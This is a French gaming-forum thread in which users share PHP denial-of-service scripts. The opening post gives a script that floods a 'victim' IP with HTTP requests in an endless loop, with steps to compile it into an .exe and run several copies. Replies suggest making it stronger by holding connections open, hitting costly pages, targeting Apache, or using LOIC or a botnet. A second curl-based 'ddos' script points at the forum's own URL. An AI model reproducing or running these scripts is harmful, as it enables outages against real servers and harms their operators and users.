Bienvenue sur

Over-Game.eu

Inscris-toi !
  • Après moultes et moultes péripétie, j'espère pouvoir reprendre normalement Over-Game. Et ainsi lui redonner sa splendeur d'antan ! Venez me le dire ici !

Je DDoS, Tu DDoS, Il... les doigts dans le nez !

Nikorwell

Bot
Inscrit
18/2/11
Messages
41
Un rêve pour certains de DDoSer comme un malade et down un site/serveur ?

Je vous aime, alors je vous donne =)

Voici un script PHP, simple, qui n'utilise pas votre FireFox, IE ou quoi que ce soit d'autre. Et pourquoi c'est le meilleur script pour Owned ? Parce qu'il n'a aucune limite dans son code.

___________________________

1/ Téléchargez BamCompile



2/ Allez dans examples/phpinfo/phpinfo.php et retirez TOUT le code, puis remplacez le par :

Code:
><?php

function init(){
echo 'Initialisation en cours...';
set_time_limit(0);
$i = '0';
echo 'OK.';
}

function ptpget($site){
echo 'Envoi des requêtes sur '.$site.'';
while (true){
	$fp = fsockopen($site, 80);
	fputs($fp, "GET /index.php HTTP/1.1\r\n");
	fputs($fp, "Host: [color="Red"]IP DU SITE DE VOTRE VICTIME[/color]\r\n\r\n");
	fclose($fp);
	$i++;
	echo $i.'|';
}
}

init();
ptpget('IP DU SITE DE VOTRE VICTIME');

?>
3/ Lancez examples/phpinfo/compile.bat

4/ Tadaaa
vous avez un en phpinfo.exe qui va apparaitre dans la fichier !

5/ Lancez le .exe ( 4, 5, 6 fenêtre celons la résistance du serveur ).

Si ce que vous voulez owned, c'est du lourd, je vous conseil de demander à un/des ami(s) de le lancer aussi.

Bonus :

Pour savoir si le site que vous essayez de DDoS est mort :



by Nikorwell


Capture.jpg

 

Spybot

Bot
Inscrit
30/12/10
Messages
27
L'idée de faire du PHP pour DoS est intéressante, mais pas forcément la plus efficace.

Certe cela n'utilise pas le navigateur, mais votre serveur PHP, donc c'est toujours votre PC qui trinque. Finalement, peut être que PHP est plus rapide que JS, vu qu'on dirait qu'il est compilé.

Sur quel site as-tu testé ceci ?

Normalement, quand tu fermes le socket, ca ferme la connection avec le serveur distant, qui annule ta requête (mais je suis pas sur ...).

Bref je suis sceptique ... Surtout que le DoS brute n'est plus tellement efficace de nos jours, on peut faire plus subtile :) '

 

Nikorwell

Bot
Inscrit
18/2/11
Messages
41
Plus subtile dis-tu, arrête tu m'intéresses Ce code sert pour les débutants.

Pour les pro* il n'a qu'une seule utilisé, DDoS les serveurs comme un malade.

Prend en exemple un bot, bot dofus par exemple, Xvolk's :

Xvolk's a un bot, tu trouves l'IP de son serveur et tu DDoS.

C'est vrai que ce DDoS est très temporaire et que le site/serveur déDown rapidement après, mais dans cette exemple du bot par exemple, cela permet de le DDoS au moins quelques secondes, et donc de déconnecter tout le monde si le serveur est lié.

Bref c'est vraiment un script débutant, d'où son utilisation simple et sa création rapide.

 

Spybot

Bot
Inscrit
30/12/10
Messages
27
Déja il faut savoir quel est le but du DoS :

- Remplir un maximum de connections TCP pour que le serveur ne puisse pas en accepter d'autres ? Dans ce cas fsockopen suffit, et il ne faut pas faire de fclose.

- Lancer un maximum de requêtes pour saturer les ressources du serveur cible ? Dans ce cas il faudrait changer changer "index.php" en la page la plus consommatrice :p '

Par exemple vers une page de recherche, ce sera une requête POST le plus fréquemment.

Petite précision :

fputs($fp, "Host: IP DU SITE DE VOTRE VICTIME\r\n\r\n");
Host contient le nom de domaine, et non l'IP du site (surtout dans le cas où on aurait plusieurs sites sur le même serveur : même IP).

Niveau subtilité, tu devrais te renseigner sur Apache, le serveur web le plus répandu, mais pas forcément le plus résistant à certaines attaques, qui le ciblent en particulier, sans pour autant monopoliser ta bande passante et ton processeur :) '

 

darkh

Bot
Inscrit
15/8/11
Messages
3
2/ Allez dans examples/phpinfo/phpinfo.php et retirez TOUT le code, puis remplacez le par :

Code:
><?php

function init(){
echo 'Initialisation en cours...';
set_time_limit(0);
$i = '0';
echo 'OK.';
}

function ptpget($site){
echo 'Envoi des requêtes sur '.$site.'';
while (true){
	$fp = fsockopen($site, 80);
	fputs($fp, "GET /index.php HTTP/1.1\r\n");
	fputs($fp, "Host: [color="Red"]IP DU SITE DE VOTRE VICTIME[/color]\r\n\r\n");
	fclose($fp);
	$i++;
	echo $i.'|';
}
}

init();
ptpget('IP DU SITE DE VOTRE VICTIME');

?>
Tu as fait une petite erreur dans ton code au niveau de ce n'est pas "Red" mais 'red'

Vu que tu utilise " juste avant host cela ne marcheras pas ;) '

 

Lokhi

Bot
Inscrit
19/6/12
Messages
2
Le problème là c'est qu'il s'agit d'attaques DoS et non DDoS, et il est très simple te bloquer le nombre de requêtes envoyé par un seul client.

Les méthodes les plus fiables que je connaisse pour DDoS, c'est LOIC ou un réseau de machine zombie.

En plus de ça, PHP ne se stoppera pas de lui même? Il fonctionne que pendant un certain temps consécutif (30secondes par défaut je crois). Si l'opération prend trop de temps il arrête d'executer le script pour éviter de ralentir la machine.

 

Gégon

Geek Ultime
Inscrit
4/1/11
Messages
2 573
Hum, ce code plutôt est pour Ddos (par requête post). ;) '

<?php

$url = "http://over-game.eu/";

$times = 50;

$wait = 500;

$attack = 1;

$footer = "removed";

if($attack == 0){

echo "[-] Operation Aborted\n";

} else {

if(ereg("http://(.*)/", $url)){

echo "[+] starting on $url\n";

ddos($url, $times, $wait);

} else {

echo "[-] Invalid url\n";

}

}

function ddos($url, $times, $wait){

for($i = 0;$i

sleep($wait);

$ch = curl_init($url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$do = curl_exec($ch);

if($do){

echo "[+][$i] Attacked :: $url\n";

curl_close($ch);

} else {

echo "[-][$i] Error :: $url\n";

curl_close($ch);

}

flush();

}

echo "[+]=- Done! -=[+]\n";

echo "Jacks -- \n$footer";

}

?>

 
Inscrit
10/6/11
Messages
10
C'est tout con le principe est le même envoyer des requêtes. Pourquoi se prendre la tête. Tu enlève la limite d’exécution php et tu fait un boucle infini par injection. Résultat bin t'as compris.

 
Haut